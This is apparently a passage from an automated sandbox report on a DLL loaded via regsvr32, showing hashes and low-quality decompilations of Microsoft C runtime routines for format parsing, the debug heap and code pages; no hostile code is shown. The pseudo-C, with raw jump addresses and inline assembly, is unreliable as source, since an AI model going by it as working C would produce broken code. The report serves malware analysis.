                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                  • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2576288505-192189897
                                                  • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                  • Instruction ID: 7af9cebcf9cdbe51cb5c05a1613d0acac690945035c75598d7829d850d960732
                                                  • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                  • Instruction Fuzzy Hash: 40515E72A0D6C68AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 26%
                                                  			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                  				void* _t139;
                                                  				char* _t159;
                                                  				char* _t160;
                                                  
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                  				_t159 =  &_a1560;
                                                  				_a88 = E000007FE7FEF9D31E40(_t159);
                                                  				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3dd83;
                                                  				_a88 = _t139 + _t159 - 0x30;
                                                  				_a116 = 0;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                  				_t160 =  &_a1560;
                                                  				_a116 = E000007FE7FEF9D31E40(_t160);
                                                  				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3dddb;
                                                  				_a116 = _t139 + _t160 - 0x30;
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3dd3b
                                                  0x7fef9d3dd3d
                                                  0x7fef9d3dd4a
                                                  0x7fef9d3dd53
                                                  0x7fef9d3dd5c
                                                  0x7fef9d3dd66
                                                  0x7fef9d3dd6a
                                                  0x7fef9d3dd7f
                                                  0x7fef9d3dd88
                                                  0x7fef9d3dda0
                                                  0x7fef9d3dda2
                                                  0x7fef9d3ddaf
                                                  0x7fef9d3ddb8
                                                  0x7fef9d3ddba
                                                  0x7fef9d3ddc2
                                                  0x7fef9d3ddd7
                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2576288505-734865713
                                                  • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                  • Instruction ID: f5bf503dfe25a3916c99f1d9d67644448d63221e22ccd8ab12d6653ca93a9968
                                                  • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                  • Instruction Fuzzy Hash: 0E510DB2A0C6C28AE7F09B64E8407BEB7E4F394345F600126E6C9879A9DB7DD445CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 24%
                                                  			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                  				void* _t113;
                                                  				char* _t133;
                                                  
                                                  				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                  				_t133 =  &_a1112;
                                                  				_a116 = E000007FE7FEF9D31E40(_t133);
                                                  				if (_a116 >= 0) goto 0xf9d3be14;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3be2d;
                                                  				_a116 = _t113 + _t133 - 0x30;
                                                  				_a972 = _a696 & 0x000000ff;
                                                  				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                  				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                  				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                  				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                  				goto 0xf9d3bfd9;
                                                  				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                  				_a1096 = _a1096 + 1;
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3beb2;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xf");
                                                  				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                  				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                  				goto 0xf9d3bfbe;
                                                  				_a704 = 0;
                                                  				goto E000007FE7FEF9D3BB66;
                                                  				goto 0xf9d3bfd9;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xb");
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}





                                                  0x7fef9d3bdf2
                                                  0x7fef9d3bdf4
                                                  0x7fef9d3be01
                                                  0x7fef9d3be0a
                                                  0x7fef9d3be0c
                                                  0x7fef9d3be14
                                                  0x7fef9d3be29
                                                  0x7fef9d3be3a
                                                  0x7fef9d3be49
                                                  0x7fef9d3be53
                                                  0x7fef9d3be61
                                                  0x7fef9d3be6b
                                                  0x7fef9d3be71
                                                  0x7fef9d3be84
                                                  0x7fef9d3be91
                                                  0x7fef9d3be9d
                                                  0x7fef9d3bea5
                                                  0x7fef9d3beae
                                                  0x7fef9d3beb2
                                                  0x7fef9d3bebb
                                                  0x7fef9d3bed1
                                                  0x7fef9d3bee2
                                                  0x7fef9d3bef0
                                                  0x7fef9d3befc
                                                  0x7fef9d3bf04
                                                  0x7fef9d3bf17
                                                  0x7fef9d3bf28
                                                  0x7fef9d3bf36
                                                  0x7fef9d3bf42
                                                  0x7fef9d3bf4a
                                                  0x7fef9d3bf5a
                                                  0x7fef9d3bf6a
                                                  0x7fef9d3bf7a
                                                  0x7fef9d3bf8a
                                                  0x7fef9d3bf9a
                                                  0x7fef9d3bfaa
                                                  0x7fef9d3bfac
                                                  0x7fef9d3bfae
                                                  0x7fef9d3bfb9
                                                  0x7fef9d3bfbe
                                                  0x7fef9d3bfc7
                                                  0x7fef9d3bfcb
                                                  0x7fef9d3bfd1
                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                  • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2576288505-192189897
                                                  • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                  • Instruction ID: 7a8513096c3cb2bd444751f94b1f2e61cedcdb1a9580f93edff9428065c01d53
                                                  • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                  • Instruction Fuzzy Hash: 0C415B72A0DAC28AE7F0DB24E8947BEB7E4E384745F600126D6DD869A9DB3DD541CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 24%
                                                  			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                  				void* _t113;
                                                  				char* _t133;
                                                  
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                  				_t133 =  &_a1560;
                                                  				_a116 = E000007FE7FEF9D31E40(_t133);
                                                  				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3dddb;
                                                  				_a116 = _t113 + _t133 - 0x30;
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}





                                                  0x7fef9d3dda0
                                                  0x7fef9d3dda2
                                                  0x7fef9d3ddaf
                                                  0x7fef9d3ddb8
                                                  0x7fef9d3ddba
                                                  0x7fef9d3ddc2
                                                  0x7fef9d3ddd7
                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2576288505-734865713
                                                  • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                  • Instruction ID: 14f8518244b6aa56c92c2133ed4feb23c5223715f37474fc6187c6031a63ef29
                                                  • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                  • Instruction Fuzzy Hash: 94414DB2A0C6C28AE7F09B64E8407BEB2E4F384746F600125D6C9875E8DB3DD444CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invoke_watson_if_oneof_swprintf_p
                                                  • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                  • API String ID: 2731067127-3604075083
                                                  • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                  • Instruction ID: d4871e39cfd66166000c08c845a9e51e3e7b3f71581565f00727d2aef18c331a
                                                  • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                  • Instruction Fuzzy Hash: C8415972A0D7C186E7A49B55E8903AEBBA0F784740FA14126E6CD47BA9DB3ED404CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 41%
                                                  			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                                  				void* _v16;
                                                  				long long _v24;
                                                  				long long _v32;
                                                  				long long _v40;
                                                  				long long _v48;
                                                  				void* _v56;
                                                  				signed int _v72;
                                                  				long long _v80;
                                                  				signed int _v88;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  				void* _t90;
                                                  				void* _t92;
                                                  				void* _t93;
                                                  				void* _t101;
                                                  				long long _t113;
                                                  				intOrPtr _t116;
                                                  				void* _t117;
                                                  				long long _t118;
                                                  				long long _t121;
                                                  				long long _t122;
                                                  				long long _t125;
                                                  				void* _t164;
                                                  
                                                  				_t113 = __rax;
                                                  				_a32 = r9d;
                                                  				_a24 = __r8;
                                                  				_a16 = __rdx;
                                                  				_a8 = __rcx;
                                                  				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
                                                  				E000007FE7FEF9D2E680(_t79, _t113);
                                                  				_v80 = _t113;
                                                  				0xf9d24000();
                                                  				_v56 = _t113 + 0x100;
                                                  				 *_v56 =  *_v56 + 1;
                                                  				if (_v88 == 0xffffffff) goto 0xf9d35103;
                                                  				if (_v88 - _a32 <= 0) goto 0xf9d35103;
                                                  				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
                                                  				_t116 = _a24;
                                                  				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
                                                  				goto 0xf9d34fbe;
                                                  				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
                                                  				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                                  				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                                  				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                                  				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                                  				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
                                                  				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
                                                  				_v48 = _t118;
                                                  				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
                                                  				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                  				_v40 = _t121;
                                                  				goto 0xf9d35041;
                                                  				_v40 = 0;
                                                  				if (_v40 == 0) goto 0xf9d350f4;
                                                  				r9d = _v72;
                                                  				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
                                                  				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                                  				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
                                                  				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
                                                  				_v32 = _t122;
                                                  				E000007FE7FEF9D2E680(_t93, _t122);
                                                  				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                  				_v24 = _t125;
                                                  				goto 0xf9d350d2;
                                                  				_v24 = 0;
                                                  				r8d = 0x103;
                                                  				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
                                                  				goto 0xf9d350f6;
                                                  				_v88 = _v72;
                                                  				goto 0xf9d34f83;
                                                  				0xf9d24000();
                                                  				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
                                                  				0xf9d24000();
                                                  				_v16 = _t125 + 0x100;
                                                  				 *_v16 =  *_v16 - 1;
                                                  				if (_v88 == 0xffffffff) goto 0xf9d3514a;
                                                  				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
                                                  				_t101 = E000007FE7FEF9D2CF80(_v16);
                                                  				r9d = _v88;
                                                  				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
                                                  			}


























                                                  0x7fef9d34f20
                                                  0x7fef9d34f20
                                                  0x7fef9d34f25
                                                  0x7fef9d34f2a
                                                  0x7fef9d34f2f
                                                  0x7fef9d34f55
                                                  0x7fef9d34f59
                                                  0x7fef9d34f5e
                                                  0x7fef9d34f63
                                                  0x7fef9d34f6e
                                                  0x7fef9d34f81
                                                  0x7fef9d34f88
                                                  0x7fef9d34f99
                                                  0x7fef9d34fa4
                                                  0x7fef9d34fa6
                                                  0x7fef9d34fb5
                                                  0x7fef9d34fb7
                                                  0x7fef9d34fbe
                                                  0x7fef9d34fcf
                                                  0x7fef9d34fda
                                                  0x7fef9d34fde
                                                  0x7fef9d34fef
                                                  0x7fef9d34ffc
                                                  0x7fef9d34ffe
                                                  0x7fef9d35003
                                                  0x7fef9d35008
                                                  0x7fef9d3502e
                                                  0x7fef9d35031
                                                  0x7fef9d35036
                                                  0x7fef9d35038
                                                  0x7fef9d35047
                                                  0x7fef9d3504d
                                                  0x7fef9d3506f
                                                  0x7fef9d35080
                                                  0x7fef9d3508d
                                                  0x7fef9d3508f
                                                  0x7fef9d35094
                                                  0x7fef9d35099
                                                  0x7fef9d350bf
                                                  0x7fef9d350c2
                                                  0x7fef9d350c7
                                                  0x7fef9d350c9
                                                  0x7fef9d350d2
                                                  0x7fef9d350ef
                                                  0x7fef9d350f4
                                                  0x7fef9d350fa
                                                  0x7fef9d350fe
                                                  0x7fef9d35103
                                                  0x7fef9d3510f
                                                  0x7fef9d35111
                                                  0x7fef9d3511c
                                                  0x7fef9d3512f
                                                  0x7fef9d35136
                                                  0x7fef9d35143
                                                  0x7fef9d35145
                                                  0x7fef9d3514a
                                                  0x7fef9d35170

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                  • String ID:
                                                  • API String ID: 2452617236-0
                                                  • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                  • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                                  • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                  • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                                  				long long _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				int _v28;
                                                  				int _v32;
                                                  				char _v64;
                                                  				long long _v72;
                                                  				intOrPtr _t29;
                                                  				intOrPtr* _t41;
                                                  
                                                  				_t41 = __rax;
                                                  				_a8 = __ecx;
                                                  				_v16 = 0xfffffffe;
                                                  				_v72 = 0;
                                                  				0xf9d266b0();
                                                  				 *0xf9d4cd68 = 0;
                                                  				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
                                                  				 *0xf9d4cd68 = 1;
                                                  				_v32 = GetOEMCP();
                                                  				E000007FE7FEF9D26800( &_v64);
                                                  				goto 0xf9d29fe3;
                                                  				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
                                                  				 *0xf9d4cd68 = 1;
                                                  				_v28 = GetACP();
                                                  				E000007FE7FEF9D26800( &_v64);
                                                  				_t29 = _v28;
                                                  				goto 0xf9d29fe3;
                                                  				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
                                                  				 *0xf9d4cd68 = 1;
                                                  				E000007FE7FEF9D26840(_t29,  &_v64);
